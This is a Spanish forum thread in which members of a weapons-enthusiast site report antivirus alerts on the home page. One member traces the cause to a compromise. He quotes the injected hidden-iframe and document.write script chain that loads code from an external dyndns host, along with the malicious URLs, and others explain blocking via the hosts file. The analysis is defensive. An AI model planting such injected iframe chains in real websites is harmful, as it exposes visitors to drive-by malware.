Pagina principal del foro...¿infectada?

grafitti · Mensajepor **grafitti** » 01 Nov 2013 11:29

Hola compañeros,

Quiero consultar este tema, y ver si es un problema mio, o del foro. De hecho, no se si es posible que pueda ser siquiera un problema del foro (no estoy muy puesto en lo que a seguridad informática se refiere).

El caso, es que desde hace unos dias a esta parte, el antivirus (Avast), me "salta" cada vez que entro en la página principal del foro (https://www.armas.es/). Antes no me lo había hecho nunca, y me indica que es una "url maliciosa".

A raíz de estos avisos, me da ayer por hacer un analisis-limpieza de mi PC, a lo que el Avast me "detecta" unos virus y/o archivos corruptos (6 en total, aunque no estoy seguro de que sea del todo cierto...eran todos archivos Android para hackear-rootear terminales Android, y me consta que estos archivos "engañan" a los antivirus, o lo que es lo mismo, los detectan como malwares o troyanos cuando en realidad no lo son), hago una limpieza (elimino esos archivos, porque puedo precindir de ellos...estaban obsoletos) y dejo limpio mi ordenador. Esta mañana vuelvo a repetir el analisis, y me da como resultado que el sistema está libre de virus.

Pues bien, mi sorpresa viene cuando entro en el foro, y vuelve a saltarme el dichoso aviso de "url maliciosa" (adjunto foto).

Mi "preocupación" es porque nunca me había hecho todo esto. Me ocurre desde hace 2 o 3 dias.

¿Podeis confirmarme que está todo ok...que es mi antivirus, que ve peligro donde no lo hay?

Gracias de antemano.

josmi · Mensajepor **josmi** » 01 Nov 2013 11:34

Ahora que lo dices, a mi me ocurre lo mismo. Algo pasa.

Un saludo

grafitti · Mensajepor **grafitti** » 01 Nov 2013 11:34

josmi escribió:Ahora que lo dices, a mi me ocurre lo mismo

Mal rollo! :roll:

josmi · Mensajepor **josmi** » 01 Nov 2013 11:45

A ver que dice el Consejo Supremo de la web.

Un sludo

byWok · Mensajepor **byWok** » 01 Nov 2013 11:51

Pepe,

Sería conveniente ver la URL completa ( eso que en la imagen que has anexado dice "Objeto: https:// .../infob.php?i=25513" ) que el Avast detecta como maliciosa.

Siempre es la misma URL?

grafitti · Mensajepor **grafitti** » 01 Nov 2013 11:57

Creo que si...que siempre es la misma.
Voy a ver si puedo verla completa Xavi. Gracias.

grafitti · Mensajepor **grafitti** » 01 Nov 2013 11:59

Esto es lo que me dice cuando le digo MAS DETALLES, y esta es la web maliciosa que me dice haber bloqueado:
https://vfk56gf594.dyndns.info/infob.php?i

refres · Mensajepor **refres** » 01 Nov 2013 12:21

grafitti escribió:Hola compañeros,

Quiero consultar este tema, y ver si es un problema mio, o del foro. De hecho, no se si es posible que pueda ser siquiera un problema del foro (no estoy muy puesto en lo que a seguridad informática se refiere).

El caso, es que desde hace unos dias a esta parte, el antivirus (Avast), me "salta" cada vez que entro en la página principal del foro (https://www.armas.es/). Antes no me lo había hecho nunca, y me indica que es una "url maliciosa".

A raíz de estos avisos, me da ayer por hacer un analisis-limpieza de mi PC

Buenas grafitti,

es extraño, yo uso el mismo antivirus y no me detecta nada.

Bueno, tambien uso más programas. Como antivirus/cortafuegos adicional: Norton Internet Security. Y como antiespias: Microsoft Security Essentials, Spybot search & destroy, y Spyware Terminator 2012.

Los actualizo a diario y realizo un escaneo completo todos los fines de semana y no he recibido ninguna alerta al entrar en la web ni en el foro.

¿Has ejecutado un analisis durante el reinicio del sistema?

Hace pocos dias el Avast se actualizo completamente (el programa, aparte de la base de datos de virus). ¿lo has actualizado?

Un saludo.

refres · Mensajepor **refres** » 01 Nov 2013 12:23

grafitti escribió:Esto es lo que me dice cuando le digo MAS DETALLES, y esta es la web maliciosa que me dice haber bloqueado:
https://vfk56gf594.dyndns.info/infob.php?i

Le he dado al enlace y me dice lo mismo que a ti, que esa pagina contiene un virus y la ha bloqueado.

byWok · Mensajepor **byWok** » 01 Nov 2013 12:27

Definitivamente, el foro está comprometido.

De momento, no parece que haya carga maliciosa, pero en cuanto el maligno lo desee, jodidos todos.

Lo que ha detectado tu Avast es una llamada a una URL externa al foro:

Código: Seleccionar todo

http://vfk56gf594.dyndns.info/infob.php?i=25513

el contenido del script infob.php es:

Código: Seleccionar todo

document.write("<iframe style='position: absolute; top: -480px; z-index: 1;' src=http://vfk56gf594.dyndns.info/slb.php?i=25513></iframe>");

Ese código hace una llamada a la URL:

Código: Seleccionar todo

http://vfk56gf594.dyndns.info/slb.php?i=25513

el contenido de ese script slb.php es:

Código: Seleccionar todo

<html>
<head></head>
<body>
</body>
</html>

que, por ahora está vacío. Pero en cuanto le ponga carga...

La cuestión es saber por qué se hace esa llamada a la URL esa.
Y parece que viene motivada por otra llamada a otra URL externa:

Código: Seleccionar todo

http://www.amigi.org/tmp/ini.php

cuyo contenido es:

Código: Seleccionar todo

<nofollow><script language='JavaScript' src=http://vfk56gf594.dyndns.info/infob.php?i=25513></script></nofollow>

Y la llamada a esa URL?
Pues está metida al final de la página principal de https://www.armas.es, justo después del </html> de cierre:

Código: Seleccionar todo

.
.
.
</body> 
</html><iframe src="http://www.amigi.org/tmp/ini.php"  width="0" height="0" frameborder="0"></iframe>

Y cómo ha llegado eso ahí? Pues desde este lado del ordenador ni idea.
El portal de Armas.es funciona con Joomla, pero no sé su versión ni si está convenientemente parcheado.
Sea como sea, lo primero sería mirar si eso está escrito "a mano" o si se genera automáticamente.
el contenido de las páginas de Joomla se generan automáticamente, pero hay secciones que se definen fijas; como las cabeceras y los pies de página.
El administrador del Joomla puede empezar por ahí.

tuareg · Mensajepor **tuareg** » 01 Nov 2013 12:39

Bywok…….y cual seria la finalidad de esa infección?

es decir, que hace ese virus…..

molestar?
joder el foro?
conseguir algún tipo de información del foro o del ordenador que lo visite????

es seguro el usar el foro…??

sabiendo la finalidad podemos saber o intuir quien puede ser el responsable.

Yo uso un Mac y no recibo nada de aviso de virus, solo que a veces tarda en cargar la pagina, y en mi ordenador ya hace años que solo tengo los programas, la información con MIS COSAS importantes la tengo en un disco duro aparte que conecto cuando necesito.

byWok · Mensajepor **byWok** » 01 Nov 2013 13:04

tuareg escribió:Bywok…….y cual seria la finalidad de esa infección?

es decir, que hace ese virus…..

molestar?
joder el foro?
conseguir algún tipo de información del foro o del ordenador que lo visite????

es seguro el usar el foro…??

sabiendo la finalidad podemos saber o intuir quien puede ser el responsable.

Yo uso un Mac y no recibo nada de aviso de virus, solo que a veces tarda en cargar la pagina, y en mi ordenador ya hace años que solo tengo los programas, la información con MIS COSAS importantes la tengo en un disco duro aparte que conecto cuando necesito.

De momento, no parece hacer nada. Pero tienen la puerta trasera abierta para, en el momento que lo deseen, añadir la carga vírica/gusano/troyano.

La URL esa de dyndns.info corresponde a un ordenador en Ucrania, así que puedes suponer que es algo relacionado con el fishing.

Sobre si es seguro usar el foro... no me pronuncio. Esto es como preguntarle al hombre del tiempo si va a hacer buen tiempo el próximo fin de semana. Seguro que recibe palos sea lo que sea que responda.

Lo cierto es que hay un agujero abierto. Inactivo, pero abierto.

Que haya antivirus que lo detecten y otros que no, es normal... de momento, nada de lo que hay es hostil. Pensad que, por ahora no hace nada que no haga cualquier banner, o ese frame con caretos de gente del FB; son llamadas a webs externas al foro.

Avast lo detecta, porque ha decidido que esa llamada es "retorcida".
Pensad que para llegar a la página "hostil", se hacen 3 llamadas a URL diferentes. Y una de ellas ( esa de https://www.amigi.org ) parece ser una víctima más.

Por ahora, si podeis tocar el fichero de hosts de vuestro ordenador, añadid la siguiente linea:

Código: Seleccionar todo

127.0.0.1 www.amigi.org

Si no sabeis de qué hablo --> https://es.wikipedia.org/wiki/Archivo_hosts

De esta manera, dejareis de acceder a la URL que inicia todo el lío.

tuareg · Mensajepor **tuareg** » 01 Nov 2013 13:10

Fishing??

Y los que tenemos Mac hacemos algo???

Gracias

byWok · Mensajepor **byWok** » 01 Nov 2013 13:15

tuareg escribió:Fishing??

Y los que tenemos Mac hacemos algo???

Gracias

Lo mismo... de momento, editar el fichero de hosts.
Eso de que un Mac es seguro e invulnerable a los virus... era antes.

Qué SO usas en tu Mac?
El foro funciona bajo linux y está comprometido, verdad?

grafitti · Mensajepor **grafitti** » 01 Nov 2013 13:39

byWok escribió:
Por ahora, si podeis tocar el fichero de hosts de vuestro ordenador, añadid la siguiente linea:

Código: Seleccionar todo
127.0.0.1 www.amigi.org

Si no sabeis de qué hablo --> https://es.wikipedia.org/wiki/Archivo_hosts

De esta manera, dejareis de acceder a la URL que inicia todo el lío.

Xavi...¿como "se toca" el fichero de hosts de nuestro ordenador?
Leo la wikipedia pero no lo entiendo. No se donde y como se toca el host.

Gracias

grafitti · Mensajepor **grafitti** » 01 Nov 2013 13:58

Vale, solucionado. He hecho lo que indicabas, Xavi, y ya no me detecta nada el antivirus. Solucionado

Para modificar el host, lo he hecho así:

Para Windows 8,Windows 7 y Windows Vista

El archivo host, en principio se encuentra aquí:
C:/Windows/System32/drivers/etc/hosts

Necesitamos iniciar sesión como administradores del equipo y además abrir el bloc de notas usando permisos extra de administrador.

-Haz clic en el Boton del Menu de inicio“menú de inicio”.

-Escribe en la barra de búsqueda “Bloc de Notas”.

-Haz clic derecho sobre el icono de bloc de notas y selecciona User Account Control permission “Ejecutar como administrador”.

-Escribe tu contraseña del equipo (si te pregunta por ella) y Selecciona “Si” en el dialogo del “Control de cuentas de usuario”.

-Navega hasta la ubicación del archivo hosts (ver sección anterior).

-Si no ves ningún archivo, entonces selecciona el menú desplegable que dice “Documentos de texto (*.txt)” y cámbialo para que diga “Todos los archivos (*.*)”.

-Selecciona el archivo hosts y haz doble clic en el o selecciona el botón “Abrir”

-Después de modificarlo, asegúrate de guardar los cambios.

guncolection · Mensajepor **guncolection** » 01 Nov 2013 15:34

A mi me pasa lo mismo...no soy entendido en informatica asi que para mi es un jaleo trastear el el host o lo que sea eso...creo que el administrador o quien corresponda deberia de arreglar este tema, si no seguramente deje de visitar el foro en una temporada

oteflo · Mensajepor **oteflo** » 01 Nov 2013 15:47

A mi el AVAST no me dice ni mú corriendo en Windows 7...yo creo que tu AVAST esta patrocinado por la ICAE..esa gran amiga de todos nosotros! Y que seguramente te pide un antivirus de Grado I por lo que toienes que bonar dinerito....jajajaja!

Pagina principal del foro...¿infectada?

Pagina principal del foro...¿infectada?

Re: Pagina principal del foro...¿infectada?

Re: Pagina principal del foro...¿infectada?

Re: Pagina principal del foro...¿infectada?

Re: Pagina principal del foro...¿infectada?

Re: Pagina principal del foro...¿infectada?

Re: Pagina principal del foro...¿infectada?

Re: Pagina principal del foro...¿infectada?

Re: Pagina principal del foro...¿infectada?

Re: Pagina principal del foro...¿infectada?

Re: Pagina principal del foro...¿infectada?

Re: Pagina principal del foro...¿infectada?

Re: Pagina principal del foro...¿infectada?

Re: Pagina principal del foro...¿infectada?

Re: Pagina principal del foro...¿infectada?

Re: Pagina principal del foro...¿infectada?

Re: Pagina principal del foro...¿infectada?

Re: Pagina principal del foro...¿infectada?

¿Quién está conectado?